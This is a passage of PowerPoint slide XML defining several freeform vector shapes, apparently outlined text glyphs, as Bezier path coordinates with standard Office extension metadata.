                    <a:pt x="38" y="136"/>
                    <a:pt x="38" y="128"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="45"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49" name="Freeform 290">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9122E971-5943-4F28-9419-0E828E7542A9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId90"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4624389" y="3465513"/>
              <a:ext cx="55563" cy="169863"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 131 w 131"/>
                <a:gd name="T1" fmla="*/ 194 h 387"/>
                <a:gd name="T2" fmla="*/ 91 w 131"/>
                <a:gd name="T3" fmla="*/ 64 h 387"/>
                <a:gd name="T4" fmla="*/ 15 w 131"/>
                <a:gd name="T5" fmla="*/ 0 h 387"/>
                <a:gd name="T6" fmla="*/ 0 w 131"/>
                <a:gd name="T7" fmla="*/ 14 h 387"/>
                <a:gd name="T8" fmla="*/ 7 w 131"/>
                <a:gd name="T9" fmla="*/ 27 h 387"/>
                <a:gd name="T10" fmla="*/ 97 w 131"/>
                <a:gd name="T11" fmla="*/ 194 h 387"/>
                <a:gd name="T12" fmla="*/ 11 w 131"/>
                <a:gd name="T13" fmla="*/ 358 h 387"/>
                <a:gd name="T14" fmla="*/ 0 w 131"/>
                <a:gd name="T15" fmla="*/ 373 h 387"/>
                <a:gd name="T16" fmla="*/ 15 w 131"/>
                <a:gd name="T17" fmla="*/ 387 h 387"/>
                <a:gd name="T18" fmla="*/ 131 w 131"/>
                <a:gd name="T19" fmla="*/ 194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387">
                  <a:moveTo>
                    <a:pt x="131" y="194"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="131" y="134"/>
                    <a:pt x="108" y="89"/>
                    <a:pt x="91" y="64"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="28"/>
                    <a:pt x="27" y="0"/>
                    <a:pt x="15" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="0"/>
                    <a:pt x="0" y="10"/>
                    <a:pt x="0" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="22"/>
                    <a:pt x="5" y="25"/>
                    <a:pt x="7" y="27"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="89" y="81"/>
                    <a:pt x="97" y="161"/>
                    <a:pt x="97" y="194"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="97" y="243"/>
                    <a:pt x="78" y="313"/>
                    <a:pt x="11" y="358"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="363"/>
                    <a:pt x="0" y="366"/>
                    <a:pt x="0" y="373"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="377"/>
                    <a:pt x="2" y="387"/>
                    <a:pt x="15" y="387"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="387"/>
                    <a:pt x="131" y="321"/>
                    <a:pt x="131" y="1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50" name="Freeform 291">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5097298E-8952-4C8D-8357-8B091DA73360}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId91"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4754564" y="3522663"/>
              <a:ext cx="30163" cy="125413"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 72 w 75"/>
                <a:gd name="T1" fmla="*/ 32 h 285"/>
                <a:gd name="T2" fmla="*/ 41 w 75"/>
                <a:gd name="T3" fmla="*/ 0 h 285"/>
                <a:gd name="T4" fmla="*/ 10 w 75"/>
                <a:gd name="T5" fmla="*/ 31 h 285"/>
                <a:gd name="T6" fmla="*/ 41 w 75"/>
                <a:gd name="T7" fmla="*/ 63 h 285"/>
                <a:gd name="T8" fmla="*/ 72 w 75"/>
                <a:gd name="T9" fmla="*/ 32 h 285"/>
                <a:gd name="T10" fmla="*/ 43 w 75"/>
                <a:gd name="T11" fmla="*/ 215 h 285"/>
                <a:gd name="T12" fmla="*/ 10 w 75"/>
                <a:gd name="T13" fmla="*/ 256 h 285"/>
                <a:gd name="T14" fmla="*/ 0 w 75"/>
                <a:gd name="T15" fmla="*/ 269 h 285"/>
                <a:gd name="T16" fmla="*/ 16 w 75"/>
                <a:gd name="T17" fmla="*/ 285 h 285"/>
                <a:gd name="T18" fmla="*/ 75 w 75"/>
                <a:gd name="T19" fmla="*/ 202 h 285"/>
                <a:gd name="T20" fmla="*/ 41 w 75"/>
                <a:gd name="T21" fmla="*/ 153 h 285"/>
                <a:gd name="T22" fmla="*/ 10 w 75"/>
                <a:gd name="T23" fmla="*/ 184 h 285"/>
                <a:gd name="T24" fmla="*/ 43 w 75"/>
                <a:gd name="T25" fmla="*/ 21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285">
                  <a:moveTo>
                    <a:pt x="72" y="32"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="13"/>
                    <a:pt x="57" y="0"/>
                    <a:pt x="41" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="0"/>
                    <a:pt x="10" y="16"/>
                    <a:pt x="10" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="50"/>
                    <a:pt x="25" y="63"/>
                    <a:pt x="41" y="63"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="60" y="63"/>
                    <a:pt x="72" y="47"/>
                    <a:pt x="72" y="32"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="43" y="215"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="242"/>
                    <a:pt x="17" y="252"/>
                    <a:pt x="10" y="256"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="257"/>
                    <a:pt x="0" y="261"/>
                    <a:pt x="0" y="269"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="276"/>
                    <a:pt x="7" y="285"/>
                    <a:pt x="16" y="285"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="27" y="285"/>
                    <a:pt x="75" y="258"/>
                    <a:pt x="75" y="202"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="169"/>
                    <a:pt x="60" y="153"/>
                    <a:pt x="41" y="153"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="153"/>
                    <a:pt x="10" y="167"/>
                    <a:pt x="10" y="184"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="198"/>
                    <a:pt x="18" y="215"/>
                    <a:pt x="43" y="21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51" name="Freeform 292">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9EF7E6A4-1CC6-4653-8D9E-D7B46922BE27}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId92"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="863601" y="3759201"/>
              <a:ext cx="85725" cy="107950"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 194 w 206"/>
                <a:gd name="T1" fmla="*/ 34 h 249"/>
                <a:gd name="T2" fmla="*/ 206 w 206"/>
                <a:gd name="T3" fmla="*/ 17 h 249"/>
                <a:gd name="T4" fmla="*/ 188 w 206"/>
                <a:gd name="T5" fmla="*/ 0 h 249"/>
                <a:gd name="T6" fmla="*/ 175 w 206"/>
                <a:gd name="T7" fmla="*/ 5 h 249"/>
                <a:gd name="T8" fmla="*/ 11 w 206"/>
                <a:gd name="T9" fmla="*/ 108 h 249"/>
                <a:gd name="T10" fmla="*/ 0 w 206"/>
                <a:gd name="T11" fmla="*/ 124 h 249"/>
                <a:gd name="T12" fmla="*/ 9 w 206"/>
                <a:gd name="T13" fmla="*/ 140 h 249"/>
                <a:gd name="T14" fmla="*/ 175 w 206"/>
                <a:gd name="T15" fmla="*/ 244 h 249"/>
                <a:gd name="T16" fmla="*/ 188 w 206"/>
                <a:gd name="T17" fmla="*/ 249 h 249"/>
                <a:gd name="T18" fmla="*/ 206 w 206"/>
                <a:gd name="T19" fmla="*/ 232 h 249"/>
                <a:gd name="T20" fmla="*/ 194 w 206"/>
                <a:gd name="T21" fmla="*/ 215 h 249"/>
                <a:gd name="T22" fmla="*/ 51 w 206"/>
                <a:gd name="T23" fmla="*/ 124 h 249"/>
                <a:gd name="T24" fmla="*/ 194 w 206"/>
                <a:gd name="T25" fmla="*/ 3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49">
                  <a:moveTo>
                    <a:pt x="194" y="34"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="199" y="31"/>
                    <a:pt x="206" y="27"/>
                    <a:pt x="206" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="206" y="6"/>
                    <a:pt x="196" y="0"/>
                    <a:pt x="188" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="184" y="0"/>
                    <a:pt x="182" y="0"/>
                    <a:pt x="175" y="5"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="11" y="108"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="111"/>
                    <a:pt x="0" y="115"/>
                    <a:pt x="0" y="124"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="131"/>
                    <a:pt x="4" y="136"/>
                    <a:pt x="9" y="140"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="175" y="244"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="182" y="249"/>
                    <a:pt x="184" y="249"/>
                    <a:pt x="188" y="249"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="196" y="249"/>
                    <a:pt x="206" y="243"/>
                    <a:pt x="206" y="232"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="206" y="222"/>
                    <a:pt x="199" y="218"/>
                    <a:pt x="194" y="215"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="51" y="124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="194" y="3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52" name="Freeform 293">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE2705ED-4E8D-4932-93C9-D2423B8A6E87}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId93"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="974726" y="3727451"/>
              <a:ext cx="84138" cy="171450"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 199 w 203"/>
                <a:gd name="T1" fmla="*/ 29 h 387"/>
                <a:gd name="T2" fmla="*/ 203 w 203"/>
                <a:gd name="T3" fmla="*/ 17 h 387"/>
                <a:gd name="T4" fmla="*/ 186 w 203"/>
                <a:gd name="T5" fmla="*/ 0 h 387"/>
                <a:gd name="T6" fmla="*/ 168 w 203"/>
                <a:gd name="T7" fmla="*/ 14 h 387"/>
                <a:gd name="T8" fmla="*/ 4 w 203"/>
                <a:gd name="T9" fmla="*/ 358 h 387"/>
                <a:gd name="T10" fmla="*/ 0 w 203"/>
                <a:gd name="T11" fmla="*/ 370 h 387"/>
                <a:gd name="T12" fmla="*/ 17 w 203"/>
                <a:gd name="T13" fmla="*/ 387 h 387"/>
                <a:gd name="T14" fmla="*/ 35 w 203"/>
                <a:gd name="T15" fmla="*/ 373 h 387"/>
                <a:gd name="T16" fmla="*/ 199 w 203"/>
                <a:gd name="T17" fmla="*/ 29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387">
                  <a:moveTo>
                    <a:pt x="199" y="29"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="203" y="21"/>
                    <a:pt x="203" y="21"/>
                    <a:pt x="203" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="203" y="8"/>
                    <a:pt x="196" y="0"/>
                    <a:pt x="186" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="175" y="0"/>
                    <a:pt x="171" y="7"/>
                    <a:pt x="168" y="14"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="4" y="358"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="366"/>
                    <a:pt x="0" y="366"/>
                    <a:pt x="0" y="370"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="379"/>
                    <a:pt x="7" y="387"/>
                    <a:pt x="17" y="387"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="28" y="387"/>
                    <a:pt x="32" y="380"/>
                    <a:pt x="35" y="373"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="199"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53" name="Freeform 294">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95FB34C4-5215-4D81-A6EC-3615AA234C7F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId94"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1087439" y="3784601"/>
              <a:ext cx="80963" cy="96838"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 113 w 193"/>
                <a:gd name="T1" fmla="*/ 92 h 222"/>
                <a:gd name="T2" fmla="*/ 79 w 193"/>
                <a:gd name="T3" fmla="*/ 86 h 222"/>
                <a:gd name="T4" fmla="*/ 31 w 193"/>
                <a:gd name="T5" fmla="*/ 58 h 222"/>
                <a:gd name="T6" fmla="*/ 94 w 193"/>
                <a:gd name="T7" fmla="*/ 30 h 222"/>
                <a:gd name="T8" fmla="*/ 144 w 193"/>
                <a:gd name="T9" fmla="*/ 58 h 222"/>
                <a:gd name="T10" fmla="*/ 161 w 193"/>
                <a:gd name="T11" fmla="*/ 75 h 222"/>
                <a:gd name="T12" fmla="*/ 178 w 193"/>
                <a:gd name="T13" fmla="*/ 54 h 222"/>
                <a:gd name="T14" fmla="*/ 178 w 193"/>
                <a:gd name="T15" fmla="*/ 20 h 222"/>
                <a:gd name="T16" fmla="*/ 163 w 193"/>
                <a:gd name="T17" fmla="*/ 0 h 222"/>
                <a:gd name="T18" fmla="*/ 149 w 193"/>
                <a:gd name="T19" fmla="*/ 10 h 222"/>
                <a:gd name="T20" fmla="*/ 95 w 193"/>
                <a:gd name="T21" fmla="*/ 0 h 222"/>
                <a:gd name="T22" fmla="*/ 0 w 193"/>
                <a:gd name="T23" fmla="*/ 58 h 222"/>
                <a:gd name="T24" fmla="*/ 99 w 193"/>
                <a:gd name="T25" fmla="*/ 120 h 222"/>
                <a:gd name="T26" fmla="*/ 163 w 193"/>
                <a:gd name="T27" fmla="*/ 157 h 222"/>
                <a:gd name="T28" fmla="*/ 99 w 193"/>
                <a:gd name="T29" fmla="*/ 192 h 222"/>
                <a:gd name="T30" fmla="*/ 35 w 193"/>
                <a:gd name="T31" fmla="*/ 147 h 222"/>
                <a:gd name="T32" fmla="*/ 18 w 193"/>
                <a:gd name="T33" fmla="*/ 133 h 222"/>
                <a:gd name="T34" fmla="*/ 0 w 193"/>
                <a:gd name="T35" fmla="*/ 153 h 222"/>
                <a:gd name="T36" fmla="*/ 0 w 193"/>
                <a:gd name="T37" fmla="*/ 202 h 222"/>
                <a:gd name="T38" fmla="*/ 15 w 193"/>
                <a:gd name="T39" fmla="*/ 222 h 222"/>
                <a:gd name="T40" fmla="*/ 34 w 193"/>
                <a:gd name="T41" fmla="*/ 203 h 222"/>
                <a:gd name="T42" fmla="*/ 99 w 193"/>
                <a:gd name="T43" fmla="*/ 222 h 222"/>
                <a:gd name="T44" fmla="*/ 193 w 193"/>
                <a:gd name="T45" fmla="*/ 157 h 222"/>
                <a:gd name="T46" fmla="*/ 113 w 193"/>
                <a:gd name="T47" fmla="*/ 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2">
                  <a:moveTo>
                    <a:pt x="113" y="92"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="102" y="90"/>
                    <a:pt x="92" y="88"/>
                    <a:pt x="79" y="86"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="84"/>
                    <a:pt x="31" y="78"/>
                    <a:pt x="31" y="58"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="31" y="45"/>
                    <a:pt x="47" y="30"/>
                    <a:pt x="94" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="136" y="30"/>
                    <a:pt x="143" y="45"/>
                    <a:pt x="144" y="58"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="145" y="66"/>
                    <a:pt x="146" y="75"/>
                    <a:pt x="161" y="75"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="75"/>
                    <a:pt x="178" y="64"/>
                    <a:pt x="178" y="54"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="178" y="20"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="12"/>
                    <a:pt x="178" y="0"/>
                    <a:pt x="163" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="152" y="0"/>
                    <a:pt x="150" y="7"/>
                    <a:pt x="149" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="127" y="0"/>
                    <a:pt x="105" y="0"/>
                    <a:pt x="95" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="0"/>
                    <a:pt x="0" y="40"/>
                    <a:pt x="0" y="58"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="104"/>
                    <a:pt x="53" y="113"/>
                    <a:pt x="99" y="120"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="123" y="124"/>
                    <a:pt x="163" y="130"/>
                    <a:pt x="163" y="157"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="163" y="175"/>
                    <a:pt x="145" y="192"/>
                    <a:pt x="99" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="192"/>
                    <a:pt x="48" y="186"/>
                    <a:pt x="35" y="147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33" y="138"/>
                    <a:pt x="31" y="133"/>
                    <a:pt x="18" y="133"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="133"/>
                    <a:pt x="0" y="143"/>
                    <a:pt x="0" y="153"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="202"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="210"/>
                    <a:pt x="0" y="222"/>
                    <a:pt x="15" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="222"/>
                    <a:pt x="28" y="221"/>
                    <a:pt x="34" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="221"/>
                    <a:pt x="85" y="222"/>
                    <a:pt x="99" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="222"/>
                    <a:pt x="193" y="181"/>
                    <a:pt x="193" y="157"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="193" y="105"/>
                    <a:pt x="129" y="94"/>
                    <a:pt x="113" y="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54" name="Freeform 295">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4358ACFD-32DA-4AB5-9A1F-27BAB49A2935}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId95"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1196976" y="3784601"/>
              <a:ext cx="84138" cy="96838"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 196 w 196"/>
                <a:gd name="T1" fmla="*/ 165 h 222"/>
                <a:gd name="T2" fmla="*/ 179 w 196"/>
                <a:gd name="T3" fmla="*/ 151 h 222"/>
                <a:gd name="T4" fmla="*/ 163 w 196"/>
                <a:gd name="T5" fmla="*/ 162 h 222"/>
                <a:gd name="T6" fmla="*/ 113 w 196"/>
                <a:gd name="T7" fmla="*/ 192 h 222"/>
                <a:gd name="T8" fmla="*/ 35 w 196"/>
                <a:gd name="T9" fmla="*/ 111 h 222"/>
                <a:gd name="T10" fmla="*/ 116 w 196"/>
                <a:gd name="T11" fmla="*/ 30 h 222"/>
                <a:gd name="T12" fmla="*/ 146 w 196"/>
                <a:gd name="T13" fmla="*/ 34 h 222"/>
                <a:gd name="T14" fmla="*/ 168 w 196"/>
                <a:gd name="T15" fmla="*/ 59 h 222"/>
                <a:gd name="T16" fmla="*/ 190 w 196"/>
                <a:gd name="T17" fmla="*/ 36 h 222"/>
                <a:gd name="T18" fmla="*/ 116 w 196"/>
                <a:gd name="T19" fmla="*/ 0 h 222"/>
                <a:gd name="T20" fmla="*/ 0 w 196"/>
                <a:gd name="T21" fmla="*/ 111 h 222"/>
                <a:gd name="T22" fmla="*/ 110 w 196"/>
                <a:gd name="T23" fmla="*/ 222 h 222"/>
                <a:gd name="T24" fmla="*/ 196 w 196"/>
                <a:gd name="T25"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22">
                  <a:moveTo>
                    <a:pt x="196" y="165"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="196" y="151"/>
                    <a:pt x="182" y="151"/>
                    <a:pt x="179" y="151"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="171" y="151"/>
                    <a:pt x="166" y="152"/>
                    <a:pt x="163" y="162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="160" y="168"/>
                    <a:pt x="150" y="192"/>
                    <a:pt x="113" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="71" y="192"/>
                    <a:pt x="35" y="157"/>
                    <a:pt x="35" y="111"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="87"/>
                    <a:pt x="49" y="30"/>
                    <a:pt x="116" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="127" y="30"/>
                    <a:pt x="146" y="30"/>
                    <a:pt x="146" y="34"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="147" y="52"/>
                    <a:pt x="156" y="59"/>
                    <a:pt x="168" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="180" y="59"/>
                    <a:pt x="190" y="50"/>
                    <a:pt x="190" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="190" y="0"/>
                    <a:pt x="139" y="0"/>
                    <a:pt x="116" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="0"/>
                    <a:pt x="0" y="67"/>
                    <a:pt x="0" y="111"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="171"/>
                    <a:pt x="47" y="222"/>
                    <a:pt x="110" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="179" y="222"/>
                    <a:pt x="196" y="173"/>
                    <a:pt x="196"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55" name="Freeform 296">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A90012C4-B476-4F61-9D60-3B4747111565}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId96"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1300164" y="3784601"/>
              <a:ext cx="95250" cy="95250"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 94 w 226"/>
                <a:gd name="T1" fmla="*/ 125 h 218"/>
                <a:gd name="T2" fmla="*/ 184 w 226"/>
                <a:gd name="T3" fmla="*/ 30 h 218"/>
                <a:gd name="T4" fmla="*/ 205 w 226"/>
                <a:gd name="T5" fmla="*/ 52 h 218"/>
                <a:gd name="T6" fmla="*/ 226 w 226"/>
                <a:gd name="T7" fmla="*/ 31 h 218"/>
                <a:gd name="T8" fmla="*/ 179 w 226"/>
                <a:gd name="T9" fmla="*/ 0 h 218"/>
                <a:gd name="T10" fmla="*/ 94 w 226"/>
                <a:gd name="T11" fmla="*/ 40 h 218"/>
                <a:gd name="T12" fmla="*/ 94 w 226"/>
                <a:gd name="T13" fmla="*/ 24 h 218"/>
                <a:gd name="T14" fmla="*/ 74 w 226"/>
                <a:gd name="T15" fmla="*/ 3 h 218"/>
                <a:gd name="T16" fmla="*/ 19 w 226"/>
                <a:gd name="T17" fmla="*/ 3 h 218"/>
                <a:gd name="T18" fmla="*/ 0 w 226"/>
                <a:gd name="T19" fmla="*/ 18 h 218"/>
                <a:gd name="T20" fmla="*/ 19 w 226"/>
                <a:gd name="T21" fmla="*/ 33 h 218"/>
                <a:gd name="T22" fmla="*/ 60 w 226"/>
                <a:gd name="T23" fmla="*/ 33 h 218"/>
                <a:gd name="T24" fmla="*/ 60 w 226"/>
                <a:gd name="T25" fmla="*/ 188 h 218"/>
                <a:gd name="T26" fmla="*/ 19 w 226"/>
                <a:gd name="T27" fmla="*/ 188 h 218"/>
                <a:gd name="T28" fmla="*/ 0 w 226"/>
                <a:gd name="T29" fmla="*/ 203 h 218"/>
                <a:gd name="T30" fmla="*/ 19 w 226"/>
                <a:gd name="T31" fmla="*/ 218 h 218"/>
                <a:gd name="T32" fmla="*/ 150 w 226"/>
                <a:gd name="T33" fmla="*/ 218 h 218"/>
                <a:gd name="T34" fmla="*/ 170 w 226"/>
                <a:gd name="T35" fmla="*/ 203 h 218"/>
                <a:gd name="T36" fmla="*/ 150 w 226"/>
                <a:gd name="T37" fmla="*/ 188 h 218"/>
                <a:gd name="T38" fmla="*/ 94 w 226"/>
                <a:gd name="T39" fmla="*/ 188 h 218"/>
                <a:gd name="T40" fmla="*/ 94 w 226"/>
                <a:gd name="T41" fmla="*/ 12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6" h="218">
                  <a:moveTo>
                    <a:pt x="94" y="125"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="94" y="78"/>
                    <a:pt x="124" y="30"/>
                    <a:pt x="184" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="185" y="42"/>
                    <a:pt x="193" y="52"/>
                    <a:pt x="205" y="52"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="216" y="52"/>
                    <a:pt x="226" y="44"/>
                    <a:pt x="226" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="226" y="21"/>
                    <a:pt x="220" y="0"/>
                    <a:pt x="179" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="154" y="0"/>
                    <a:pt x="122" y="9"/>
                    <a:pt x="94" y="40"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="94" y="24"/>
                  </a:lnTo>
                  <a:cubicBezTo>
